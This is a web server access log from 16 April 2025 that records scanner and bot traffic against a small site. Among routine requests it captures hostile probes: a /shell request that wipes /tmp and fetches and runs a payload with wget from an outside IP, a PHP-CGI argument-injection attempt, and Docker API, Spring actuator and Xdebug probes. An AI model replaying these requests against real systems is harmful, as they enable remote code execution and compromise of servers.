101.198.0.151 - - [16/Apr/2025:02:09:53 +0200] "\x16\x03\x01\x015\x01" 400 383 "-" "-"
101.198.0.150 - - [16/Apr/2025:02:09:54 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
101.198.0.150 - - [16/Apr/2025:02:09:58 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.180 - - [16/Apr/2025:02:10:01 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.151 - - [16/Apr/2025:02:10:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.181 - - [16/Apr/2025:02:10:05 +0200] "GET /config.json HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
151.106.169.76 - - [16/Apr/2025:02:12:32 +0200] "GET /download/file.php?id=230&sid=bc5e5031ade0bd6b6d97f875627f2e36 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [16/Apr/2025:02:12:32 +0200] "GET /download/file.php?id=230&sid=bc5e5031ade0bd6b6d97f875627f2e36 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [16/Apr/2025:02:12:33 +0200] "GET /download/file.php?id=230&sid=bc5e5031ade0bd6b6d97f875627f2e36 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [16/Apr/2025:02:16:58 +0200] "GET /cron.php?cron_type=tidy_cache&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [16/Apr/2025:02:16:58 +0200] "GET /cron.php?cron_type=tidy_cache&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [16/Apr/2025:02:16:58 +0200] "GET /cron.php?cron_type=tidy_cache&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [16/Apr/2025:02:18:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:02:26:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:02:39:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [16/Apr/2025:02:50:42 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
151.106.186.76 - - [16/Apr/2025:02:57:59 +0200] "GET /download/file.php?id=251&sid=784074281812cc900dbee8d05e9ed409 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [16/Apr/2025:02:57:59 +0200] "GET /download/file.php?id=251&sid=784074281812cc900dbee8d05e9ed409 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.186.76 - - [16/Apr/2025:02:58:00 +0200] "GET /download/file.php?id=251&sid=784074281812cc900dbee8d05e9ed409 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [16/Apr/2025:02:59:48 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b35149883f858b84b93ea34f45c176ca HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [16/Apr/2025:02:59:49 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b35149883f858b84b93ea34f45c176ca HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [16/Apr/2025:02:59:49 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b35149883f858b84b93ea34f45c176ca HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
185.218.86.4 - - [16/Apr/2025:03:03:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [16/Apr/2025:03:04:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:03:05:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.169.76 - - [16/Apr/2025:03:13:13 +0200] "GET /download/file.php?id=250&sid=e90c3c271f3ec3c30474b3067feaed50 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [16/Apr/2025:03:13:13 +0200] "GET /download/file.php?id=250&sid=e90c3c271f3ec3c30474b3067feaed50 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [16/Apr/2025:03:13:13 +0200] "GET /download/file.php?id=250&sid=e90c3c271f3ec3c30474b3067feaed50 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
5.183.209.244 - - [16/Apr/2025:03:13:20 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
123.6.49.6 - - [16/Apr/2025:03:13:35 +0200] "\x16\x03\x01\x018\x01" 400 383 "-" "-"
123.6.49.42 - - [16/Apr/2025:03:13:37 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
123.6.49.6 - - [16/Apr/2025:03:13:41 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.6.49.36 - - [16/Apr/2025:03:13:46 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.6.49.49 - - [16/Apr/2025:03:13:51 +0200] "GET /sitemap.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
123.6.49.46 - - [16/Apr/2025:03:13:55 +0200] "GET /config.json HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
151.106.163.240 - - [16/Apr/2025:03:17:47 +0200] "GET /gallery/image.php?mode=medium&album_id=3&image_id=90&sid=20ed85a9497d13f0c8dbaeeffe2da8b4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:03:17:47 +0200] "GET /gallery/image.php?mode=medium&album_id=3&image_id=90&sid=20ed85a9497d13f0c8dbaeeffe2da8b4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:03:17:48 +0200] "GET /gallery/image.php?mode=medium&album_id=3&image_id=90&sid=20ed85a9497d13f0c8dbaeeffe2da8b4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [16/Apr/2025:03:23:12 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=fee15a89b8e31e942ed6fbfe0f423160 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [16/Apr/2025:03:23:12 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=fee15a89b8e31e942ed6fbfe0f423160 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [16/Apr/2025:03:23:13 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=fee15a89b8e31e942ed6fbfe0f423160 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
167.71.52.166 - - [16/Apr/2025:03:26:27 +0200] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/4.1)"
154.81.156.54 - - [16/Apr/2025:03:29:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [16/Apr/2025:03:34:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.144.35.103 - - [16/Apr/2025:03:39:44 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
101.198.0.151 - - [16/Apr/2025:03:51:29 +0200] "\x16\x03\x01\x018\x01" 400 383 "-" "-"
101.198.0.152 - - [16/Apr/2025:03:51:30 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
101.198.0.187 - - [16/Apr/2025:03:51:34 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.150 - - [16/Apr/2025:03:51:38 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.151 - - [16/Apr/2025:03:51:41 +0200] "GET /sitemap.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
154.81.156.54 - - [16/Apr/2025:03:54:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:03:59:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.20 - - [16/Apr/2025:04:06:37 +0200] "-" 408 - "-" "-"
151.106.163.240 - - [16/Apr/2025:04:25:58 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=4aa4123490fd623f9ca4883a7ec78ea8 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:04:25:58 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=4aa4123490fd623f9ca4883a7ec78ea8 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:04:25:58 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=4aa4123490fd623f9ca4883a7ec78ea8 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [16/Apr/2025:04:29:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [16/Apr/2025:04:32:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [16/Apr/2025:04:39:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [16/Apr/2025:04:44:00 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.81.156.54 - - [16/Apr/2025:04:50:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:05:11:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:05:25:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
118.25.148.66 - - [16/Apr/2025:05:34:14 +0200] "GET /containers/json HTTP/1.1" 404 360 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
118.25.148.66 - - [16/Apr/2025:05:34:15 +0200] "GET /version HTTP/1.1" 404 352 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
118.25.148.66 - - [16/Apr/2025:05:34:15 +0200] "GET /containers/json HTTP/1.1" 404 360 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
118.25.148.66 - - [16/Apr/2025:05:34:16 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
35.203.211.115 - - [16/Apr/2025:05:35:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.81.156.35 - - [16/Apr/2025:05:45:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:05:47:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [16/Apr/2025:05:50:18 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.81.156.34 - - [16/Apr/2025:06:09:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.163.240 - - [16/Apr/2025:06:09:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=386809e1a7741368353dc55a66f982f8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:06:09:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=386809e1a7741368353dc55a66f982f8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:06:09:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=386809e1a7741368353dc55a66f982f8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [16/Apr/2025:06:17:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.202 - - [16/Apr/2025:06:19:36 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
92.255.57.58 - - [16/Apr/2025:06:24:53 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
154.81.156.54 - - [16/Apr/2025:06:28:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [16/Apr/2025:06:46:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [16/Apr/2025:06:51:03 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-T537A Build/KOT49H) AppleWebKit/537.36 (KHTML like Gecko) Chrome/35.0.1916.141 Safari/537.36"
154.81.156.54 - - [16/Apr/2025:06:53:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.77.149.227 - - [16/Apr/2025:07:01:54 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
154.81.156.54 - - [16/Apr/2025:07:05:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [16/Apr/2025:07:07:49 +0200] "\x16\x03\x01\x02" 400 383 "-" "-"
151.106.169.76 - - [16/Apr/2025:07:19:34 +0200] "GET /download/file.php?id=254&sid=e889d10900f63fe88e9b972b3329a492 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [16/Apr/2025:07:19:35 +0200] "GET /download/file.php?id=254&sid=e889d10900f63fe88e9b972b3329a492 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [16/Apr/2025:07:19:35 +0200] "GET /download/file.php?id=254&sid=e889d10900f63fe88e9b972b3329a492 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [16/Apr/2025:07:39:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [16/Apr/2025:07:43:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.48.80.38 - - [16/Apr/2025:07:48:04 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
68.48.80.38 - - [16/Apr/2025:07:48:06 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
75.119.146.30 - - [16/Apr/2025:07:48:12 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
45.79.120.183 - - [16/Apr/2025:07:52:25 +0200] "\x16\x03\x01" 400 383 "-" "-"
45.79.120.183 - - [16/Apr/2025:07:52:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
151.106.163.240 - - [16/Apr/2025:07:57:08 +0200] "GET /download/file.php?id=256&sid=aca3283b7000fad638637dc4318c4d6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:07:57:09 +0200] "GET /download/file.php?id=256&sid=aca3283b7000fad638637dc4318c4d6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [16/Apr/2025:07:57:09 +0200] "GET /download/file.php?id=256&sid=aca3283b7000fad638637dc4318c4d6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
43.133.187.11 - - [16/Apr/2025:07:57:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [16/Apr/2025:07:57:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [16/Apr/2025:08:04:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
101.198.0.152 - - [16/Apr/2025:08:04:53 +0200] "\x16\x03\x01\x013\x01" 400 383 "-" "-"
101.198.0.152 - - [16/Apr/2025:08:04:53 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
101.198.0.152 - - [16/Apr/2025:08:04:54 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.181 - - [16/Apr/2025:08:04:55 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.189 - - [16/Apr/2025:08:04:55 +0200] "GET /sitemap.xml HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.198.0.155 - - [16/Apr/2025:08:04:55 +0200] "GET /config.json HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
60.172.59.153 - - [16/Apr/2025:08:12:27 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world"
101.199.254.242 - - [16/Apr/2025:08:12:55 +0200] "\x16\x03\x01\x014\x01" 400 383 "-" "-"
101.199.254.232 - - [16/Apr/2025:08:12:57 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
101.199.254.236 - - [16/Apr/2025:08:13:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.199.254.198 - - [16/Apr/2025:08:13:07 +0200] "GET /robots.txt HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.199.254.242 - - [16/Apr/2025:08:13:13 +0200] "GET /sitemap.xml HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.199.254.243 - - [16/Apr/2025:08:13:18 +0200] "GET /config.json HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
